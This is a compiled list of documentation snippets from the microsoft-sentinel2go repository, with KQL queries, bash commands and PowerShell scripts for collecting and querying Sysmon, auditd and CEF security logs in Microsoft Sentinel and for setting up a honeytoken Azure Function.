Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/Linux/demos/CVE-2021-44228-Log4Shell/README.md This KQL query filters Syslog messages for 'sysmon' and parses XML to extract EventIDs and EventData, then pivots to display relevant fields. ```kql Syslog | where ProcessName == 'sysmon' | extend EventID = parse_xml(SyslogMessage).Event.System.EventID | extend EventData = parse_xml(SyslogMessage).Event.EventData.Data | mv-expand bagexpansion=array EventData | evaluate bag_unpack(EventData) | extend Key=tostring(['@Name']), Value=['#text'] | evaluate pivot( Key, any(Value), TimeGenerated, TenantId, SourceSystem, EventID, Computer, Facility, SeverityLevel, HostIP, MG, Type, _ResourceId ) ``` -------------------------------- ### Query CommonSecurityLog in Microsoft Sentinel Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/CEF-Log-Analytics-Agent/README.md This KQL query can be used in Microsoft Sentinel to search for specific CEF events within the CommonSecurityLog table, filtering by DeviceEventClassID. ```kql CommonSecurityLog | where DeviceEventClassID == 'Morto RDP Request Traffic(13274)' ``` -------------------------------- ### Check OMS Auditd Service Status Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/Linux/demos/CVE-2021-44228-Log4Shell/README.md Confirm that the AUOMS service is running on an Ubuntu system. ```bash service auoms status ``` -------------------------------- ### Windows Registry XML Query Definition Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/README.md Defines a list of XPath queries for Windows Security Events, targeting registry key deletion, modification, and access events. This XML structure is used by data collection rules. ```xml ``` -------------------------------- ### Reset SCX Logging to Intermediate Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/Linux/demos/CVE-2021-38647-OMI/README.md Use this command to reset all SCX logging levels back to 'intermediate'. This is typically done after verbose logging is no longer needed. ```bash /opt/microsoft/scx/bin/tools/scxadmin -log-set all intermediate ``` -------------------------------- ### Extract Security Events to PowerShell Hash Table Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/README.md This script iterates through a collection of mappings and filters for 'Security' log channels. It organizes the data into a nested hash table structure based on data source and data component, storing event IDs and names. Use this to prepare event data for XML generation. ```PowerShell $allMappings = @{} foreach ($item in $mappings) { if ($item.log_channel -eq 'Security'){ if (!($allMappings.contains($item.data_source))){ $allMappings.$($item.data_source) = @{} } if (!($allMappings[$item.data_source].contains($item.data_component))){ $allMappings[$item.data_source][$item.data_component] = @() } if (!($allMappings[$item.data_source][$item.data_component] | Where-Object {$_.EventID -eq "$($item.event_id)"})) { $eventObject = @{ EventID = "$($item.event_id)" EventName = "$($item.event_name)" } if ($item.filter_in.ToString() -ne 'NaN'){ $eventObject += @{Filters = $item.filter_in} } $allMappings[$item.data_source][$item.data_component] += $eventObject } } } ``` -------------------------------- ### Query OMS Auditd Execve Events in Microsoft Sentinel Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/Linux/demos/CVE-2021-44228-Log4Shell/README.md This KQL query defines and calls a function 'execve' to filter Syslog messages for 'AUOMS_EXECVE' events, parsing detailed execution data including process information and command lines. ```kql let execve=(){ Syslog | where SyslogMessage has "AUOMS_EXECVE" | parse SyslogMessage with "type=" EventType " audit(" * "): " EventData | where EventType =~ "AUOMS_EXECVE" | project TimeGenerated, EventType, Computer, EventData | extend EventData = trim_end('containerid=',EventData) | parse kind=regex EventData with * "success=" success " exit=" * "ppid=" ppid "pid=" pid "audit_user=" audit_user "auid=" * "user=" user " uid=" uid " group=" * "comm=\"" comm "\"" * "cwd=\"" cwd "" name=\"" name "" (inode|nametype)=" * "(proctitle|cmdline)=" cmdline | extend cmdline = trim_end('redactors=.*',cmdline) }; execve ``` -------------------------------- ### Define Orchestrator URI Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/Custom-Logs-Pipeline/README.md Sets the URI for the Azure Function orchestrator. Ensure you replace '' with your actual function app name. ```PowerShell $orchestrator = 'https://.azurewebsites.net/api/orchestrators/Orchestrator' ``` -------------------------------- ### Set Current Directory (PowerShell) Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/README.md Sets the current directory for the PowerShell session to the current location. This is a session-only setting. ```PowerShell [Environment]::CurrentDirectory=(Get-Location -PSProvider FileSystem).ProviderPath ``` -------------------------------- ### Generate Unique Azure Function App Name Source: https://github.com/otrf/microsoft-sentinel2go/blob/master/grocery-list/Deception/README.md Generates a unique application name for an Azure Function by combining 'honeytoken' with 10 random alphanumeric characters. Ensure the name is lowercase as required by Azure naming conventions. ```PowerShell $functionAppName = (-join ('honeytoken',-join ((65..90) + (97..122) | Get-Random -Count 10 | % {[char]$_}))).ToLower() ``` === COMPLETE CONTENT === This response contains all available snippets from this library. No additional content exists. Do not make further requests.